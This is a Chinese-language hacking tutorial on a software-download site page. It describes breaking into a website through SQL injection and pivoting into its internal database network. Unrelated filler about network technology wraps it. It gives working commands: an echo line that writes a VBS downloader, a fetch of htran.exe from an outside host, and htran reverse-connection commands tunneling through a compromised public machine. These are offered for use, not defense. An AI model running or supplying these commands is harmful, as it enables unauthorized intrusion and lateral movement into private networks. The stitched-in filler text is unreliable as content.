|
網絡技術是從1990年代中期發展起來的新技術,它把互聯網上分散的資源融為有機整體,實現資源的全面共享和有機協作,使人們能夠透明地使用資源的整體能力并按需獲取信息。資源包括高性能計算機、存儲資源、數據資源、信息資源、知識資源、專家資源、大型數據庫、網絡、傳感器等。 當前的互聯網只限于信息共享,網絡則被認為是互聯網發展的第三階段。 一、踩點主機: http://www.baidu.com/ OS:Windows 2000 + IIS 5.0 + MSSQL 端口:80 21 數據庫放內網,IP為 192.168.1.2 ,更重要的是內網數據庫可以上網. 首頁存在注入漏洞,sa登陸. 注入點: http://www.baidu.com/list.asp?id=1 二、入侵思路 1.給內網目標機裝個代理服務器 2.把弄好的那個代理端口映到公網. 3.本機用sockscap連接公網映的那個端口,這樣,自己也就進到了內網。 4.接下來就是找共享,嗅探,社會工程學等等了。 三、入侵準備 1.公網肉雞一只:218.3.1.1 2.工具:htran2.4,SocksCap,掃描器一份,NBSI 2.0一份。 3.A表示數據庫主機,B表示公網肉雞 C表示網站放Web的地方 D表示本機(也在內網) 4.A:192.168.1.2 B:218.3.1.1 C:www.baidu.com D:192.168.0.25 四、入侵進行時 1.工具上傳: 在nbsi下執行: echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open ^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s = CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type = 1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >down.vbs 然后下載工具: cscript down.vbs http://IP/htran.exe htran.exe //到我的空間下載htran.exe 2.安裝Socks5服務 在nbsi下執行: htran.exe -install //安裝Socks5服務 htran.exe -start //啟動Socks5服務 3.反彈進行時 在B上運行: htran.exe -s -listen 520 5200 //監聽端口 在nbsi下執行:htran.exe -s -connect 218.3.1.1 520 3.進入內網 現在用SocksCap連接 218.3.1.1 的5200端口,就等于進入了他的內網。 五、滲透內網 接下來就可以掃描,嗅探,等等,也就是后話了。 六、總結 文章技術性不高,有錯的地方希望高手指出,偶是菜鳥,也希望這篇文章對大家有所幫助。 網絡的神奇作用吸引著越來越多的用戶加入其中,正因如此,網絡的承受能力也面臨著越來越嚴峻的考驗―從硬件上、軟件上、所用標準上......,各項技術都需要適時應勢,對應發展,這正是網絡迅速走向進步的催化劑。 |
溫馨提示:喜歡本站的話,請收藏一下本站!
本站發布的Win7純凈版系統、Win10純凈版和XP純凈版系統僅為個人學習測試使用,請在下載后24小時內刪除,不得用于任何商業用途,否則后果自負,請支持購買微軟正版軟件!
本站所有資源全部來自于網絡資源,如侵犯到您的權益,請及時通知我們(),我們會及時處理.
Copyright © 2018-2020 蘿卜系統 手機站 關于本站
